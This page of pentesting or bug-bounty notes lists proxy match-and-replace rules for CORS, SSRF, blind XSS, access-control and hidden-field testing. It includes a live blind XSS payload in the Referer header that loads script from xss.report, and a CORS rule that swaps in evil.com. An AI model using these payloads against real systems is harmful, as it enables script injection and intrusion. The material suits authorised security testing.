Match & replace Rules

Match & Replace rules to Automate

CORS misconfigurations

Type: Request Header
Match: https://target.com
Replace: http://evil.com
Comment: CORS misconfigurations

SSRF

Type: Request Header
Match: https?:\/\/(www\.)?[-a-zA-Z0-9@:%._\+~#=]{1,256}\.[a-zA-Z0-9()]{1,6}\b([-a-zA-Z0-9()@:%_\+.~#?&//=]*)
Replace: https://{My Canary token}/
Comment: SSRF
    Regex Match

Blind XSS

Type: Request Header
Match: ^Referer.*$
Replace: Referer: '"><script src=https://xss.report/c/swagpk></script>
Comment: Blind XSS
    Regex Match

Acess controll

Type: Response Body
Match: false
Replace: true
Comment: Allow Acess controll

Type: Response Body
Match: error
Replace: success
Comment: Allow Acess controll

Find hidden parameters/input fields

Type: Rwsponse Body
Match: type\=(\"|')hidden(\"|')
Replace: type="text"
Comment: Find hidden input fields
    Regex Match

PreviousManual Testing NextMy Concept

Last updated 1 hour ago